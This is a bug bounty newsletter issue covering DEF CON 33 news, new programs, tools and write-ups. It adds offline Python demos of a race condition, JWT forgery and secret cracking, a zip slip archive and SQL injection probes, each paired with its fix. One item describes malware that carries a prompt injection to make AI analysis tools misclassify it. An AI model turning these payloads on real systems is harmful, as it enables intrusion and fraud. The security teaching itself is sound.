Disclosed. July 20, 2025. DEF CON 33 Badge Pre-Orders, Bug Bounty Village Agenda, HackAICon Announcement, NullCon Scholarships, Caido Acquires Shift, and More
The bug bounty world, curated.
Welcome to Disclosed.

Each week, 3 readers will win a 1-month PentesterLab Pro license, completely free. Refer a friend to the newsletter to enter.
Shout out to this week’s winners (I will email you):
1hehaq
vasanthabalanak
tokjaygopal
PentesterLab is one of the best hands-on platforms for learning web security, with real-world vulnerabilities, private labs, and practical exercises trusted by professionals and bug bounty hunters worldwide.
Huge thanks to PentesterLab for sponsoring this giveaway and supporting the Disclosed. community. ❤️

Hey there! We’re just weeks away from DEF CON. If you’re attending Hacker Summer Camp and happen to see me, please stop by and say hi.
Please forgive the DEF CON spam you’ll probably see from me over the next couple of weeks. We’ve been putting so much work into Bug Bounty Village, and I couldn’t be more excited about what we have planned for this year.
Let’s dive in.
In This Issue

Limited Edition Bug Bounty Village Badge Pre-Orders [🔗 Tweet]
by Bug Bounty Village
Pre-orders for the exclusive DEF CON 33 badge are now available. Don’t miss your chance to order online before they sell out. This is a huge way to support our village and get something dope in return.
Pre-Order Now →

Caido Acquires Shift Plugin, Now Free for Users [🔗 Tweet]
by Caido
Caido has acquired the Shift Plugin, now free for paid users, enhancing their toolkit with features like payload crafting and HTTPQL queries.
Read more →
We are super excited to share that we acquired the Shift Plugin (shiftplugin.com) and we are making it free to Caido paid users 🚀
Shift is a Caido plugin that is a smart AI companion for your hacking. It can craft payloads, Match&Replace rules, HTTPQL queries and much
— Caido (@CaidoIO)
4:47 PM • Jul 16, 2025
Bug Bounty Village at DEF CON 33 Agenda Released [🔗 Tweet]
by Bug Bounty Village
The agenda for Bug Bounty Village at DEF CON 33 has been published, highlighting speakers, sessions, and networking opportunities.
Read more →
The wait is finally over! We have published the Bug Bounty Village agenda for DEF CON 33. Want to know what you can learn, who you’ll meet, and when your favorite speaker takes the stage? Check out the full lineup at bugbountydefcon.com/agenda.
— Bug Bounty Village (@BugBountyDEFCON)
10:40 PM • Jul 14, 2025
HackAICon 2025 Announced [🔗 Tweet]
by André Baptista
On September 25, 2025, at Lisbon’s LX Factory, HackAICon 2025 brings together hackers, OffSec pros, and researchers to explore how AI can secure the internet, with talks, workshops, hacking challenges, and networking.
Read more →
Want to learn more about the latest in AI hacking?
Then you may not want to miss HackAICon. It's gonna happen on September 25!
Register at:
— André Baptista (@0xacb)
8:37 AM • Jul 15, 2025
Have something you want to Spotlight? Tell me.

Bug Bounty Hunter Scholarship at Nullcon Berlin 2025 [📓 Form]
by NullCon
Nullcon Berlin 2025 is offering a Bug Bounty Hunter Scholarship, providing selected applicants with a free conference pass to attend talks, workshops, CTFs, and networking events on 4–5 September 2025. Applicants must submit their details and experience by 28 July 2025.
Read more →

Join New Bug Bounty Program with Up to $5,000 Rewards [🔗 Tweet]
by HackenProof
No Ones App has launched a bug bounty program on HackenProof, with rewards from $150 to $5,000 depending on severity; the program is open to researchers now.
Read more →
✅[New bug bounty] Earn up to $5,000 with @noonesapp
You will be rewarded based on these tiers:
- Critical: $2,500 - $5,000
- High: $1,000 - $2,500
- Medium: $300 - $750
- Low: $150 - $200
Start the #bugbounty hunt right now: hackenproof.com/programs/noone…
— HackenProof (@HackenProof)
4:19 PM • Jul 17, 2025
New Microsoft Domains Added for Identity Bug Bounty [🔗 Tweet]
by xss0r
Six new domains have been added to Microsoft's Identity Bug Bounty program, with significant rewards for XSS vulnerabilities based on impact and report quality.
Read more →
🚨 Big News for Bug Bounty Hunters! 🔍💰
Microsoft has just added 6 new domains to their Identity Bug Bounty scope! 🎯
If you're into hunting XSS this is your chance!
🆕 Newly Added Domains (as of July 18, 2025):
mysignins.microsoft.com
myaccount.microsoft.com
— xss0r (@xss0r)
6:36 PM • Jul 18, 2025
Highlights from the Live Hacking Event at leHACK 2025 [🔗 Tweet]
by YesWeHack ⠵
A video recap from leHACK 2025 showcases engaging activities and highlights from this year's event.
Read more →
Did I miss an important update? Tell me.

Introducing PwnFox for Enhanced Burp Suite Testing [🔗 Tool]
by BApp Store
PwnFox is a Firefox and Burp Suite extension for multi-session testing: each Firefox container gets its own isolated cookies and a colour, and Burp highlights that container’s traffic in the same colour, so several accounts can be tested side by side without mixing sessions.
Read more →

Revolutionize Hacking with Custom Actions for AI Payloads [🔗 Tool]
by Gareth Heyes ‼
Automate request rewrites and generate payloads with Custom Actions, enhancing offensive automation techniques.
Read more →
You're not ready for how powerful Custom Actions are.
You can now build your own AI hacking sidekicks that rewrite requests for you.
Forget typing payloads - just let your assistant do it.
🔥 Welcome to the future of offensive automation.
Prompt and source code 👇
— Gareth Heyes (@garethheyes)
1:44 PM • Jul 17, 2025
New JXScout Pro Release Improves VSCode Asset Navigation [🔗 Tool]
by Francisco Neves
The latest JXScout Pro release enhances navigation in VSCode, revealing additional JavaScript files not visible in browsers.
Read more →
🚀 New release of jxscout pro is out!
Lots of improvements on the navigation of assets in VSCode!
📝 Changelog: jxscout.app/changelog#vsco…
🔎 Cool to see the JS files that were uncovered by jxscout and not by the browser in the new release
— Francisco Neves (@fneves97)
9:48 AM • Jul 13, 2025
Bug Bounty Recon Toolkit [🔗 Tool]
by adce626
Introducing the ADCE626 Bug Bounty Toolkit, a resource that enables users to generate reconnaissance commands based on target domains, supporting over 50 tools for various techniques.
Read more →

Restore HackerOne's Classic Look with New Chrome Extension [🔗 Tool]
by Ali Tütüncü
A new Chrome extension restores HackerOne's classic interface, offering improved usability for users preferring the previous design.
Read more →
I know many of you aren’t fans of the new HackerOne dark mode. I’ve built a small Chrome extension to bring back the old look.
There are still a few bugs (some purple elements remain), but I’ll be working on it more tonight. For now, it’s already a big improvement over the
— Ali Tütüncü (@alicanact60)
4:34 PM • Jul 17, 2025
XSS Gym - Train your XSS Muscles [🔗 Tool]
by KNOXSS
The XSS Gym platform provides hands-on training for Cross-Site Scripting vulnerabilities, featuring code examples and additional resources for practice and learning.
Read more →
Have a favorite tool? Tell me.

From .git Disclosure to Remote Code Execution & More - Blog - Sudarshana [📓 Blog]
by Unknown author
Chronicling a bug bounty investigation that progressed from an exposed .git directory to remote code execution, detailing the exploitation techniques and tools used along the way.
Read more →

Break into any Microsoft building: Leaking PII in Microsoft Guest Check-In | blog.faav.top [📓 Blog]
by Unknown author
This write-up outlines a vulnerability in Microsoft's Guest Check-In system that exposes PII, detailing the methods used to exploit the issue using Burp Suite.
Read more →
HackerOne | Report #1577940 - Banned user still has access to their deleted account via HackerOne's API using their API key [📓 Blog]
by Unknown author
Documenting a critical vulnerability that allows banned users to retain access to their deleted accounts via HackerOne's API, emphasizing risks related to improper access controls.
Read more →
Did I miss an important update? Tell me.

Race Condition on Reddit’s Coin Purchase API [🎥 Video]
by DeadOverflow
This video explains a race condition vulnerability in Reddit’s Android app that let a researcher inflate purchased coins by sending multiple parallel requests before the transaction ID was invalidated. The flaw allowed getting more coins than paid for, yet Reddit classified it as medium severity and awarded only $500, sparking debate over its true impact.
Watch video →
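An added in-process model of the race described above, not Reddit’s code and not the researcher’s exploit: one purchase receipt, N parallel redeem calls, and a barrier standing in for the timing window. The vulnerable path checks the receipt, credits the coins, then invalidates the receipt as three separate steps; the fixed path does check, invalidate and credit under one lock. Receipt ID, amounts and class names are constructed for the example.

```python
import threading


class CoinLedger:
    """Constructed model of a coin-purchase redemption endpoint (not Reddit's implementation)."""

    def __init__(self, transaction_ids):
        self.pending = set(transaction_ids)   # purchase receipts not yet redeemed
        self.coins = 0
        self.lock = threading.Lock()

    def redeem_vulnerable(self, tx_id: str, amount: int, gate: threading.Barrier) -> bool:
        # Step 1: check that the receipt is still valid.
        if tx_id not in self.pending:
            return False
        # The race window: the barrier stands in for network jitter and lets every
        # parallel request get past the check before any of them invalidates the receipt.
        gate.wait()
        # Step 2: credit. Step 3: invalidate. The counter itself is locked, so the only
        # defect here is that check and invalidate are not one atomic operation.
        with self.lock:
            self.coins += amount
        self.pending.discard(tx_id)
        return True

    def redeem_fixed(self, tx_id: str, amount: int, gate: threading.Barrier) -> bool:
        gate.wait()
        # Check, invalidate and credit under one lock. In a real service this is a single
        # conditional UPDATE (or compare-and-swap) on the receipt row, not a Python lock.
        with self.lock:
            if tx_id not in self.pending:
                return False
            self.pending.discard(tx_id)
            self.coins += amount
        return True


def run_race(fixed: bool, parallel_requests: int = 10, amount: int = 100) -> int:
    """Fire `parallel_requests` redeems of the same receipt and return the coins credited."""
    ledger = CoinLedger({"receipt-0001"})           # constructed receipt ID
    gate = threading.Barrier(parallel_requests)
    method = ledger.redeem_fixed if fixed else ledger.redeem_vulnerable
    threads = [
        threading.Thread(target=method, args=("receipt-0001", amount, gate))
        for _ in range(parallel_requests)
    ]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return ledger.coins


if __name__ == "__main__":
    print("vulnerable:", run_race(fixed=False), "coins for one", 100, "coin purchase")
    print("fixed:     ", run_race(fixed=True), "coins for one", 100, "coin purchase")
```

The barrier makes the outcome deterministic for the demo; against a live API the same effect is reached with a burst of simultaneous requests (Burp’s single-packet attack, for example), and the fix is the same: invalidate the receipt in the same atomic operation that grants the credit.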
Stop Ignoring These Business Logic Issues! [🎥 Video]
by Medusa
Discussing various types of business logic vulnerabilities that have led to real bug bounty payouts, highlighting their implications.
Watch video →
This Tiny JWT Mistake = Massive Bug Bounty [🎥 Video]
by NahamSec
This video explains how attackers exploit JSON Web Tokens (JWTs) through techniques like weak secret cracking, algorithm confusion, and misconfigured dev environments. The creator demonstrates a real-world case where a dev JWT worked on production because both shared the same signing key, enabling account takeover — highlighting how small JWT misconfigurations can lead to serious security breaches and big bounties.
Watch video →
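An added example, not NahamSec’s code or any real target’s implementation, that models the shared-key mistake with a minimal HS256 implementation from the Python standard library: a token minted with the dev key verifies against a prod verifier only when prod reuses that key. The same strict verifier doubles as the oracle for an offline dictionary attack on a weak secret and rejects an alg=none token. All keys, claims and the wordlist are constructed for the example.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _segment(obj: dict) -> str:
    return _b64url(json.dumps(obj, separators=(",", ":"), sort_keys=True).encode())


def sign_hs256(payload: dict, key: bytes) -> str:
    """Mint a JWT the way an app's auth service would (HS256 only)."""
    signing_input = _segment({"alg": "HS256", "typ": "JWT"}) + "." + _segment(payload)
    sig = hmac.new(key, signing_input.encode("ascii"), hashlib.sha256).digest()
    return signing_input + "." + _b64url(sig)


def forge_alg_none(payload: dict) -> str:
    """Attacker token: header claims alg=none and the signature segment is empty."""
    return _segment({"alg": "none", "typ": "JWT"}) + "." + _segment(payload) + "."


def verify_hs256(token: str, key: bytes) -> Optional[dict]:
    """Strict verifier: pins the algorithm to HS256 and compares the MAC in constant time."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    head, body, sig = parts
    try:
        header = json.loads(_b64url_decode(head))
        provided = _b64url_decode(sig)
    except (ValueError, UnicodeDecodeError):
        return None
    if header.get("alg") != "HS256":        # refuses 'none' and any other algorithm switch
        return None
    expected = hmac.new(key, f"{head}.{body}".encode("ascii"), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, provided):
        return None
    return json.loads(_b64url_decode(body))


# Constructed keys. The misconfiguration from the video is modelled by giving prod the
# same secret as dev; the corrected deployment gets its own key.
DEV_KEY = b"dev-signing-key"
PROD_KEY_SHARED_WITH_DEV = DEV_KEY
PROD_KEY_SEPARATE = b"prod-only-signing-key-0xc0ffee"


def dev_token_accepted_by_prod(prod_key: bytes) -> bool:
    """Mint a token in the dev environment and present it to a production verifier."""
    dev_token = sign_hs256({"sub": "victim@example.com", "role": "admin", "env": "dev"}, DEV_KEY)
    return verify_hs256(dev_token, prod_key) is not None


def crack_weak_secret(token: str, wordlist) -> Optional[bytes]:
    """Offline dictionary attack: the verifier is the oracle, so no requests hit the target."""
    for candidate in wordlist:
        if verify_hs256(token, candidate) is not None:
            return candidate
    return None


if __name__ == "__main__":
    print("dev token accepted by prod (shared key):  ", dev_token_accepted_by_prod(PROD_KEY_SHARED_WITH_DEV))
    print("dev token accepted by prod (separate key):", dev_token_accepted_by_prod(PROD_KEY_SEPARATE))
    weak = sign_hs256({"sub": "u1"}, b"secret")
    print("cracked secret:", crack_weak_secret(weak, [b"password", b"123456", b"secret"]))
    print("alg=none accepted:", verify_hs256(forge_alg_none({"sub": "u1", "role": "admin"}), DEV_KEY) is not None)
```

The practitioner’s checks follow directly: does a token from staging or dev validate on prod, does a short wordlist recover the HS256 secret, and does the verifier accept a header it never issued.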
Hack. Hustle. Repeat. with NahamSec | SecMeet 0x04 [🎥 Video]
by Amr Elsagaei (AmrSec)
AmrSec interviews NahamSec about starting in bug bounties, overcoming plateaus, going full-time, financial discipline, and building a meaningful personal brand in hacking.
Read more →
Exploiting Zip Slip Vulnerabilities in File Uploads [🎥 Video]
by BePractical
This video shows how to exploit a zip slip vulnerability in web apps that extract user-uploaded zip files, by crafting malicious file paths to overwrite or escape the intended directory. The creator demonstrates the attack with a Python script and highlights the risks of poor path validation.
Watch video →
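A worked version of the attack and the fix, added here as an illustration and not code from the video or from BePractical: it builds a constructed archive with a `../../evil.txt` entry in memory, extracts it with the naive join-and-write pattern to show the file landing outside the upload directory, then runs a hardened extractor that rejects traversal components and re-checks the resolved path before writing anything. Directory and entry names are made up for the demo.

```python
import io
import os
import posixpath
import tempfile
import zipfile

# Constructed sample inputs: a benign archive and one whose entry walks out of the target dir.
CLEAN_ENTRIES = {"notes.txt": "harmless"}
MALICIOUS_ENTRIES = {"notes.txt": "harmless", "../../evil.txt": "written outside the upload dir"}


def build_archive(entries: dict) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)          # zipfile stores the name verbatim, '..' included
    return buf.getvalue()


def extract_naive(archive: bytes, dest: str) -> list:
    """Vulnerable pattern: joins the untrusted entry name onto dest and writes wherever it lands."""
    written = []
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for info in zf.infolist():
            target = os.path.join(dest, info.filename)
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as fh:
                fh.write(zf.read(info))
            written.append(os.path.realpath(target))
    return written


def extract_safe(archive: bytes, dest: str) -> list:
    """Hardened: validate every name first, then confirm the resolved path stays under dest."""
    root = os.path.realpath(dest)
    written = []
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        targets = []
        for info in zf.infolist():           # reject before writing anything at all
            name = info.filename.replace("\\", "/")
            if posixpath.isabs(name) or ".." in name.split("/"):
                raise ValueError(f"refusing unsafe entry: {info.filename!r}")
            target = os.path.realpath(os.path.join(root, name))
            if os.path.commonpath([root, target]) != root:   # defence in depth, e.g. symlinked dirs
                raise ValueError(f"entry resolves outside {root}: {info.filename!r}")
            targets.append((info, target))
        for info, target in targets:
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as fh:
                fh.write(zf.read(info))
            written.append(target)
    return written


def run_demo() -> dict:
    """Run both extractors in a scratch directory and report what happened."""
    base = tempfile.mkdtemp(prefix="zipslip-")
    upload_dir = os.path.join(base, "uploads", "job1")   # constructed target directory
    os.makedirs(upload_dir)
    root = os.path.realpath(upload_dir)

    naive_paths = extract_naive(build_archive(MALICIOUS_ENTRIES), upload_dir)
    escaped = [p for p in naive_paths if os.path.commonpath([root, p]) != root]
    try:
        extract_safe(build_archive(MALICIOUS_ENTRIES), upload_dir)
        rejected = False
    except ValueError:
        rejected = True
    clean_paths = extract_safe(build_archive(CLEAN_ENTRIES), upload_dir)

    return {
        "naive_escaped": escaped == [os.path.realpath(os.path.join(base, "evil.txt"))],
        "evil_file_exists": os.path.exists(os.path.join(base, "evil.txt")),
        "safe_rejected": rejected,
        "safe_clean_ok": clean_paths == [os.path.join(root, "notes.txt")],
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

The two-pass shape matters: a hardened extractor that validates as it writes still leaves the benign entries on disk when a later entry is rejected, which is a useful foothold for an attacker who controls archive ordering.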
How I got my First Bounty in a Billion-Dollar Company [🎥 Video]
by Magn4
The creator shares how they earned their first $100 bug bounty by manually discovering an open redirect vulnerability on a heavily tested program. They also demonstrate the vulnerability in a simulated lab, offer advice to beginners, and encourage viewers to join the community and watch more educational content.
Read more →
Critical Thinking Ep. 131 – Hacks, Secrets, and Bug Bounty Insights [🎥 Video]
by Critical Thinking Bug Bounty Podcast
Live hackalongs, SSRF & IDOR bugs, GitHub orphaned secrets, Google’s prompt-injection defense, niche hacking strategies, and why contributing back matters.
Read more →
Did I miss something? Tell me.

Comprehensive Guide to Detecting SQL Injection Vulnerabilities [🔗 Tweet]
by Muqsit 𝕏
This guide explains how to find SQL injection vulnerabilities using both manual methods (like error-based and boolean tests) and automated tools (like sqlmap and Burp Suite). It also covers SQL basics, web app spidering, and practicing safely with labs like WebGoat and Juice Shop to prepare for real bug bounty hunts.
Read more →
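An added example, not from the guide or its author, of the two manual tests the thread describes, run offline against a constructed SQLite table: an error-based probe (a lone quote), a boolean-based probe (a true and a false tautology that should only diverge when input reaches the SQL parser), and the filter bypass that shows the impact. The vulnerable lookup concatenates strings; the safe one is parameterized, and the same probes come back negative against it. Table, rows and function names are constructed.

```python
import sqlite3
from typing import Callable, List

Lookup = Callable[[str], List[str]]


def make_db() -> sqlite3.Connection:
    """Constructed sample data: two public products and one the WHERE clause is meant to hide."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, public INTEGER)")
    conn.executemany(
        "INSERT INTO products (name, public) VALUES (?, ?)",
        [("widget", 1), ("gadget", 1), ("internal-tool", 0)],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, name: str) -> List[str]:
    """String-concatenated query: user input becomes part of the SQL grammar."""
    sql = f"SELECT name FROM products WHERE public = 1 AND name = '{name}'"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn: sqlite3.Connection, name: str) -> List[str]:
    """Parameterized query: the driver sends the value separately from the statement."""
    sql = "SELECT name FROM products WHERE public = 1 AND name = ?"
    return [row[0] for row in conn.execute(sql, (name,))]


def error_probe(lookup: Lookup) -> bool:
    """Error-based test: a lone quote only breaks the statement if it reached the parser."""
    try:
        lookup("'")
    except sqlite3.Error:
        return True
    return False


def boolean_probe(lookup: Lookup, known_value: str = "widget") -> bool:
    """Boolean-based test: a true and a false tautology diverge only when injection works."""
    true_case = lookup(known_value + "' AND '1'='1")
    false_case = lookup(known_value + "' AND '1'='2")
    return true_case != false_case


def filter_bypass(lookup: Lookup) -> List[str]:
    """Impact demo: an OR tautology defeats the public = 1 restriction (AND binds tighter than OR)."""
    return lookup("x' OR '1'='1")


if __name__ == "__main__":
    db = make_db()
    for label, fn in (("vulnerable", lookup_vulnerable), ("parameterized", lookup_safe)):
        probe = lambda n, fn=fn: fn(db, n)
        print(f"{label}: error={error_probe(probe)} boolean={boolean_probe(probe)} bypass={filter_bypass(probe)}")
```

On a real target the responses are HTTP bodies rather than Python lists, so the boolean probe compares page length or a marker string instead of exact equality; the logic is the same, and it is exactly what sqlmap automates.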

How to find bugs on a hardened target using gadgets [📓 Blog]
by BugCrowd
This article guides readers through finding and exploiting minor vulnerabilities on hardened targets, emphasizing reconnaissance and chaining exploits for higher impact.
Read more →

Recon to Master: The Complete Bug Bounty Checklist [📓 Blog]
by CoffinXP
A comprehensive bug bounty checklist focusing on advanced reconnaissance techniques and tools critical for vulnerability discovery.
Read more →

GitHub dorking for beginners: How to find more vulnerabilities using GitHub search [📓 Blog]
by Intigriti
Teaching the basics of GitHub dorking to uncover vulnerabilities, including practical search patterns for discovering sensitive data.
Read more →
Malware Sample Shows Prompt Injection Attempt by Threat Actor [🔗 Tweet]
by Clint Gibler
Check Point describes a malware sample that embeds a prompt injection aimed at AI-assisted analysis tools, an attempt to steer the model into misclassifying the sample, and what it signals about attacker interest in the technique.
Read more →
Did I miss something? Tell me.

Don't Overlook Bug Bounty Opportunities Based on Report Counts [🔗 Thread]
by Gospel
Encouraging bug bounty hunters to consider targets with numerous reports, as valuable vulnerabilities may still exist.
Read more →
When choosing a target on H1 or any bug bounty platform, don’t get discouraged by the number of reports it already has. If you only focus on that, you might skip good opportunities.
— 40sp3l (@40sp3l)
1:35 PM • Jul 16, 2025
Explore Upcoming Chrome Features for Security Bypasses [🔗 Tweet]
by André Baptista
Discussing Google’s upcoming Chrome features that could assist in discovering new security bypasses.
Read more →
Looking for new bypasses or gadgets in Chrome?
Google publicly shares upcoming Chrome features through 'Intent to Ship' posts for community review.
Definitely worth keeping an eye on 👇
groups.google.com/a/chromium.org…
Shout-out to @ctbbpodcast for the tip!
— André Baptista (@0xacb)
9:02 AM • Jul 16, 2025
Success at SteelCon: First Bug Found and Critical Auth Bypass [🔗 Tweet]
by Nathan Jones
Recapping a successful bug bounty gathering where participants discovered a critical authentication bypass bug.
Read more →
Had a blast hosting the bug bounty gathering at @Steel_Con again this year. We had lots of traffic, a presentation, group hacking and someone found their first bug (which was a critical auth bypass!).
Amazing, thanks to everyone who made this happen.
#hackerone #steelcon
— Nathan Jones (@njcve_)
11:15 AM • Jul 13, 2025
Top 3 Highly Rewarded Exploitable Vulnerabilities [🔗 Thread]
by Intigriti
A detailed thread sharing three easy-to-exploit vulnerabilities that often yield significant bounty payouts.
Read more →
3 Easy-to-exploit vulnerabilities that often receive HUGE bounties! 🤑
A thread! 🧵👇
— Intigriti (@intigriti)
9:13 AM • Jul 18, 2025
Five Tips to Start Your Cybersecurity Career [🔗 Thread]
by bugcrowd
Offering five expert tips for breaking into the cybersecurity field, aimed at newcomers with no prior experience.
Read more →
How to break into cybersecurity without any prior experience.
This thread breaks down 5 expert tips to help you hack your way into a cyber career👇
— bugcrowd (@Bugcrowd)
5:02 PM • Jul 15, 2025
Did I miss something? Tell me.
Did you like this week's drop? Please share feedback.
Because Disclosure Matters: This newsletter was produced with the assistance of AI. While I strive for accuracy and quality, not all content has been independently vetted or fact-checked. Please allow for a reasonable margin of error. The views expressed are my own and do not reflect those of my employer.